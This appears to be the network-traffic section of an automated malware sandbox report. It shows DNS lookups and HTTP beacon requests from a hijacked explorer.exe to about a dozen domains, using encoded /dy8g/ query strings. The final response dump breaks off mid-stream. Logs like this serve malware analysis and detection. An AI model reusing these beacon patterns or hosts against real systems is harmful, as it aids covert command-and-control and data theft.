                                                                                                                        Jun 22, 2021 18:26:01.347481966 CEST192.168.2.68.8.8.80x84beStandard query (0)www.avito-payment.lifeA (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:26:06.486386061 CEST192.168.2.68.8.8.80x2016Standard query (0)www.thenorthgoldline.comA (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:26:11.774780035 CEST192.168.2.68.8.8.80x5665Standard query (0)www.guys-only.comA (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:26:17.734756947 CEST192.168.2.68.8.8.80xfb0dStandard query (0)www.wideawakemomma.comA (IP address)IN (0x0001)

                                                                                                                        DNS Answers

                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                        Jun 22, 2021 18:25:02.361603022 CEST8.8.8.8192.168.2.60xaf89No error (0)www.invisiongc.netinvisiongc.netCNAME (Canonical name)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:25:02.361603022 CEST8.8.8.8192.168.2.60xaf89No error (0)invisiongc.net34.102.136.180A (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:25:07.642466068 CEST8.8.8.8192.168.2.60x7d4cNo error (0)www.killrstudio.comkillrstudio.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:25:07.642466068 CEST8.8.8.8192.168.2.60x7d4cNo error (0)killrstudio.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:25:12.949099064 CEST8.8.8.8192.168.2.60x6cadNo error (0)www.ivoirepneus.com213.186.33.5A (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:25:18.266730070 CEST8.8.8.8192.168.2.60x5255No error (0)www.extinctionbrews.comextinctionbrews.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:25:18.266730070 CEST8.8.8.8192.168.2.60x5255No error (0)extinctionbrews.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:25:23.532597065 CEST8.8.8.8192.168.2.60x14f9No error (0)www.cindywillardrealtor.comcindywillardrealtor.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:25:23.532597065 CEST8.8.8.8192.168.2.60x14f9No error (0)cindywillardrealtor.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:25:28.953159094 CEST8.8.8.8192.168.2.60x2779No error (0)www.doityourselfism.comdoityourselfism.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:25:28.953159094 CEST8.8.8.8192.168.2.60x2779No error (0)doityourselfism.com169.62.77.158A (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:25:34.678531885 CEST8.8.8.8192.168.2.60x5716Server failure (2)www.saludflv.infononenoneA (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:25:39.783648968 CEST8.8.8.8192.168.2.60xc48eNo error (0)www.builtbydawn.com172.67.129.33A (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:25:39.783648968 CEST8.8.8.8192.168.2.60xc48eNo error (0)www.builtbydawn.com104.21.2.115A (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:25:44.998709917 CEST8.8.8.8192.168.2.60xeaa6No error (0)www.qq66520.com166.88.88.176A (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:25:50.750444889 CEST8.8.8.8192.168.2.60xf777No error (0)www.mzyxi-rkah-y.net52.79.124.173A (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:26:01.425106049 CEST8.8.8.8192.168.2.60x84beName error (3)www.avito-payment.lifenonenoneA (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:26:06.553442001 CEST8.8.8.8192.168.2.60x2016No error (0)www.thenorthgoldline.com825610.parkingcrew.netCNAME (Canonical name)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:26:06.553442001 CEST8.8.8.8192.168.2.60x2016No error (0)825610.parkingcrew.net75.2.81.221A (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:26:11.852895021 CEST8.8.8.8192.168.2.60x5665No error (0)www.guys-only.com154.196.232.108A (IP address)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:26:17.813395023 CEST8.8.8.8192.168.2.60xfb0dNo error (0)www.wideawakemomma.comwideawakemomma.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Jun 22, 2021 18:26:17.813395023 CEST8.8.8.8192.168.2.60xfb0dNo error (0)wideawakemomma.com34.102.136.180A (IP address)IN (0x0001)

                                                                                                                        HTTP Request Dependency Graph

                                                                                                                        • www.invisiongc.net
                                                                                                                        • www.killrstudio.com
                                                                                                                        • www.ivoirepneus.com
                                                                                                                        • www.extinctionbrews.com
                                                                                                                        • www.cindywillardrealtor.com
                                                                                                                        • www.doityourselfism.com
                                                                                                                        • www.builtbydawn.com
                                                                                                                        • www.qq66520.com
                                                                                                                        • www.mzyxi-rkah-y.net
                                                                                                                        • www.thenorthgoldline.com
                                                                                                                        • www.guys-only.com
                                                                                                                        • www.wideawakemomma.com

                                                                                                                        HTTP Packets

                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        0192.168.2.64975634.102.136.18080C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Jun 22, 2021 18:25:02.409568071 CEST4856OUTGET /dy8g/?6l-=6lY0&A4Ll=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZraksguVxeKRya9uu2A== HTTP/1.1
                                                                                                                        Host: www.invisiongc.net
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Jun 22, 2021 18:25:02.550642014 CEST4857INHTTP/1.1 403 Forbidden
                                                                                                                        Server: openresty
                                                                                                                        Date: Tue, 22 Jun 2021 16:25:02 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 275
                                                                                                                        ETag: "60c7be46-113"
                                                                                                                        Via: 1.1 google
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        1192.168.2.64975734.102.136.18080C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Jun 22, 2021 18:25:07.686913967 CEST5602OUTGET /dy8g/?A4Ll=cuaraJgkoEfCri9CHpn14TbyfEdnqeu3xvSLUqjD8bR4lpFRWk9obMnQWFhWIe7eI+ID23wHyg==&6l-=6lY0 HTTP/1.1
                                                                                                                        Host: www.killrstudio.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Jun 22, 2021 18:25:07.827526093 CEST5603INHTTP/1.1 403 Forbidden
                                                                                                                        Server: openresty
                                                                                                                        Date: Tue, 22 Jun 2021 16:25:07 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 275
                                                                                                                        ETag: "60cf306c-113"
                                                                                                                        Via: 1.1 google
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        10192.168.2.649772154.196.232.10880C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Jun 22, 2021 18:26:12.087053061 CEST5669OUTGET /dy8g/?A4Ll=xnzbbPmlZmYZGqrTQxh0SyAvVYBEHJsgluOUHMC+sqx7GSIQl98agFOAtXHHwP8thCN3RkXuRg==&6l-=6lY0 HTTP/1.1
                                                                                                                        Host: www.guys-only.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Jun 22, 2021 18:26:12.319773912 CEST5669INHTTP/1.1 200 OK
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Server: Nginx Microsoft-HTTPAPI/2.0
                                                                                                                        X-Powered-By: Nginx
                                                                                                                        Date: Tue, 22 Jun 2021 16:26:14 GMT
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 33 0d 0a ef bb bf 0d 0a
                                                                                                                        Data Ascii: 3


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        11192.168.2.64977334.102.136.18080C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Jun 22, 2021 18:26:17.859261036 CEST5670OUTGET /dy8g/?6l-=6lY0&A4Ll=n9TsU/XZirCaXaeSUYbcU/ldcwtyxBDUqcAV1OuBRveQ+2sj4hTKAs/tsBBJXfdNhkQaXcLrpw== HTTP/1.1
                                                                                                                        Host: www.wideawakemomma.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Jun 22, 2021 18:26:17.999823093 CEST5671INHTTP/1.1 403 Forbidden
                                                                                                                        Server: openresty
                                                                                                                        Date: Tue, 22 Jun 2021 16:26:17 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 275
                                                                                                                        ETag: "60c7be46-113"
                                                                                                                        Via: 1.1 google
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        2192.168.2.649758213.186.33.580C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Jun 22, 2021 18:25:13.103247881 CEST5616OUTGET /dy8g/?6l-=6lY0&A4Ll=txuHOH5mmlRIAzfI6nqq0ViggBeEQnMt8DQXoVThNh6+jXgye1aguJwAyFZ9eO3q4TbjPHrHlw== HTTP/1.1
                                                                                                                        Host: www.ivoirepneus.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Jun 22, 2021 18:25:13.156203032 CEST5617INHTTP/1.1 302 Moved Temporarily
                                                                                                                        Server: nginx
                                                                                                                        Date: Tue, 22 Jun 2021 16:25:13 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 138
                                                                                                                        Connection: close
                                                                                                                        Location: http://www.ivoirepneus.com
                                                                                                                        X-IPLB-Instance: 16978
                                                                                                                        Set-Cookie: SERVERID77446=200178|YNIO7|YNIO7; path=/
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        3192.168.2.64975934.102.136.18080C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Jun 22, 2021 18:25:18.311331034 CEST5617OUTGET /dy8g/?A4Ll=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGP3cSH4hj9/IphBwA==&6l-=6lY0 HTTP/1.1
                                                                                                                        Host: www.extinctionbrews.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Jun 22, 2021 18:25:18.451875925 CEST5618INHTTP/1.1 403 Forbidden
                                                                                                                        Server: openresty
                                                                                                                        Date: Tue, 22 Jun 2021 16:25:18 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 275
                                                                                                                        ETag: "60c7be46-113"
                                                                                                                        Via: 1.1 google
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        4192.168.2.64976034.102.136.18080C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Jun 22, 2021 18:25:23.578876019 CEST5619OUTGET /dy8g/?6l-=6lY0&A4Ll=d70oYrFBgMb8Os9vLLnU0lHHdKTBSZLAimar8DFO2VzVjiqJdJvZleKp8o1L2qAF92htTMNNUg== HTTP/1.1
                                                                                                                        Host: www.cindywillardrealtor.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Jun 22, 2021 18:25:23.719109058 CEST5619INHTTP/1.1 403 Forbidden
                                                                                                                        Server: openresty
                                                                                                                        Date: Tue, 22 Jun 2021 16:25:23 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 275
                                                                                                                        ETag: "60c7be46-113"
                                                                                                                        Via: 1.1 google
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        5192.168.2.649761169.62.77.15880C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Jun 22, 2021 18:25:29.144289017 CEST5620OUTGET /dy8g/?A4Ll=Y4JBfBjBKMGzbUzrNu+ARLK4ZQab+dap1kq40YSvqSzyJ/mfRg4U9+Lz1eKJfRLK3cAmaa0bkw==&6l-=6lY0 HTTP/1.1
                                                                                                                        Host: www.doityourselfism.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Jun 22, 2021 18:25:29.339704037 CEST5621INHTTP/1.1 302 Found
                                                                                                                        Date: Tue, 22 Jun 2021 16:25:29 GMT
                                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16 mod_apreq2-20090110/2.8.0 mod_perl/2.0.11 Perl/v5.16.3
                                                                                                                        Location: http://ww1.doityourselfism.com/?A4Ll=Y4JBfBjBKMGzbUzrNu+ARLK4ZQab+dap1kq40YSvqSzyJ/mfRg4U9+Lz1eKJfRLK3cAmaa0bkw==&6l-=6lY0
                                                                                                                        Content-Length: 310
                                                                                                                        Connection: close
                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 31 2e 64 6f 69 74 79 6f 75 72 73 65 6c 66 69 73 6d 2e 63 6f 6d 2f 3f 41 34 4c 6c 3d 59 34 4a 42 66 42 6a 42 4b 4d 47 7a 62 55 7a 72 4e 75 2b 41 52 4c 4b 34 5a 51 61 62 2b 64 61 70 31 6b 71 34 30 59 53 76 71 53 7a 79 4a 2f 6d 66 52 67 34 55 39 2b 4c 7a 31 65 4b 4a 66 52 4c 4b 33 63 41 6d 61 61 30 62 6b 77 3d 3d 26 61 6d 70 3b 36 6c 2d 3d 36 6c 59 30 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://ww1.doityourselfism.com/?A4Ll=Y4JBfBjBKMGzbUzrNu+ARLK4ZQab+dap1kq40YSvqSzyJ/mfRg4U9+Lz1eKJfRLK3cAmaa0bkw==&amp;6l-=6lY0">here</a>.</p></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        6192.168.2.649766172.67.129.3380C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Jun 22, 2021 18:25:39.828190088 CEST5640OUTGET /dy8g/?A4Ll=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUHJ1zZD6cROGeNm54w==&6l-=6lY0 HTTP/1.1
                                                                                                                        Host: www.builtbydawn.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Jun 22, 2021 18:25:39.894753933 CEST5641INHTTP/1.1 301 Moved Permanently
                                                                                                                        Date: Tue, 22 Jun 2021 16:25:39 GMT
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Cache-Control: max-age=3600
                                                                                                                        Expires: Tue, 22 Jun 2021 17:25:39 GMT
                                                                                                                        Location: https://www.builtbydawn.com/dy8g/?A4Ll=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUHJ1zZD6cROGeNm54w==&6l-=6lY0
                                                                                                                        cf-request-id: 0ad623bf16000032447085d000000001
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=4LSx3QPsSWq1uFYqrGXbf8LvK1fi%2FqXets7CKG0Y5i4lubM%2FgteHR997gQM%2Fu7raxmn7xfaolxGhWAY%2BOTOcGXlJL4wtWIlhfMZa30mFTKXBc%2FKatV97PIcqd6Ev1fr0Ow%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 6636d5782cbf3244-FRA
                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        7192.168.2.649767166.88.88.17680C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Jun 22, 2021 18:25:45.192420959 CEST5643OUTGET /dy8g/?6l-=6lY0&A4Ll=rxSGsMlf+TpCm2paceR4OA9vkYPhboYZiWSl1OoSBIXvvwNRDuCI148weh0JxST9QqctWF9UAQ== HTTP/1.1
                                                                                                                        Host: www.qq66520.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Jun 22, 2021 18:25:45.386563063 CEST5644INHTTP/1.1 200 OK
                                                                                                                        Server: nginx
                                                                                                                        Date: Tue, 22 Jun 2021 16:25:45 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 4861
                                                                                                                        Connection: close
                                                                                                                        Vary: Accept-Encoding
                                                                                                                        Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 d7 f1 d2 e5 d2 d3 c9 d5 b5 e7 d7 d3 c9 cc ce f1 d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 32 33 35 36 37 3b 26 23 31 39 39 39 36 3b 26 23 33 35 31 39 39 3b 26 23 32 35 31 36 35 3b 26 23 31 39 39 36 38 3b 26 23 32 36 36 38 31 3b 26 23 32 35 31 36 33 3b 26 23 32 35 33 35 31 3b 26 23 32 33 36 30 31 3b 26 23 32 31 38 39 38 3b 26 23 33 30 31 34 30 3b 26 23 32 30 31 30 32 3b 26 23 39 35 3b 26 23 32 33 35 36 37 3b 26 23 31 39 39 39 36 3b 26 23 33 35 31 39 39 3b 26 23 32 30 33 32 30 3b 26 23 32 36 31 35 39 3b 26 23 31 39 39 38 31 3b 26 23 32 36 31 35 39 3b 26 23 32 37 34 32 34 3b 26 23 39 39 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 33 38 34 30 35 3b 26 23 33 35 38 33 35 3b 26 23 39 35 3b 26 23 32 31 34 34 38 3b 26 23 32 32 39 30 39 3b 26 23 32 39 36 30 39 3b 26 23 32 31 34 34 38 3b 26 23 32 30 38 36 39 3b 26 23 32 33 33 38 34 3b 26 23 32 33 35 36 37 3b 26 23 33 30 33 34 30 3b 26 23 32 33 35 36 37 3b 26 23 34 30 36 34 34 3b 26 23 32 37 38 33 33 3b 26 23 32 38 32 31 36 3b 26 23 32 35 31 30 33 3b 26 23 39 35 3b 26 23 32 35 31 30 34 3b 26 23 32 34 31 38 30 3b 26 23 32 32 38 39 39 3b 26 23 32 30 31 35 34 3b 26 23 32 30 38 31 33 3b 26 